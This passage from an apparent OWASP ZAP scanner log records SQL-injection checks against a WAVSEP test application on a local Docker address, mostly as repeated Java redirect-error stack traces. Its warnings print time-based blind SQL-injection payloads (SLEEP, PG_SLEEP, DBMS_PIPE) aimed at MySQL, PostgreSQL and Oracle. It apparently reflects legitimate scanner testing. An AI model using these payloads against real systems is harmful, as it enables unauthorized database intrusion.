Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680723 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))zbzs)-- qKjC] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))zbzs)-- qKjC at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680724 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(101)||CHR(100)||CHR(108),5) FROM DUAL--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(101)||CHR(100)||CHR(108),5) FROM DUAL-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680725 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) AND 2224=(SELECT 2224 FROM PG_SLEEP(5)) AND (9051=9051] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND 2224=(SELECT 2224 FROM PG_SLEEP(5)) AND (9051=9051 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680725 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))PEVM) AND (9772=9772] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) AND (SELECT * FROM (SELECT(SLEEP(5)))PEVM) AND (9772=9772 at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680726 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))wfbG)] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))wfbG) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680727 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 9056=(SELECT 9056 FROM PG_SLEEP(5))] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 9056=(SELECT 9056 FROM PG_SLEEP(5)) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680728 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))LNVJ) AND ('TXeS'='TXeS] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND (SELECT * FROM (SELECT(SLEEP(5)))LNVJ) AND ('TXeS'='TXeS at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680728 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini') AND 8768=(SELECT 8768 FROM PG_SLEEP(5)) AND ('ULNK'='ULNK] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') AND 8768=(SELECT 8768 FROM PG_SLEEP(5)) AND ('ULNK'='ULNK at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680730 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))Hcim) AND 'Lbkz'='Lbkz] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND (SELECT * FROM (SELECT(SLEEP(5)))Hcim) AND 'Lbkz'='Lbkz at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680730 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini' AND 9205=(SELECT 9205 FROM PG_SLEEP(5)) AND 'BRFh'='BRFh] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini' AND 9205=(SELECT 9205 FROM PG_SLEEP(5)) AND 'BRFh'='BRFh at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680731 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%' AND 2176=(SELECT 2176 FROM PG_SLEEP(5)) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND 2176=(SELECT 2176 FROM PG_SLEEP(5)) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680731 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))etBt) AND '%'='] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%' AND (SELECT * FROM (SELECT(SLEEP(5)))etBt) AND '%'=' at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680733 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini AND 6862=(SELECT 6862 FROM PG_SLEEP(5))-- wrES] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND 6862=(SELECT 6862 FROM PG_SLEEP(5))-- wrES at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680733 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))wBeo)-- xxER] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini AND (SELECT * FROM (SELECT(SLEEP(5)))wBeo)-- xxER at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown 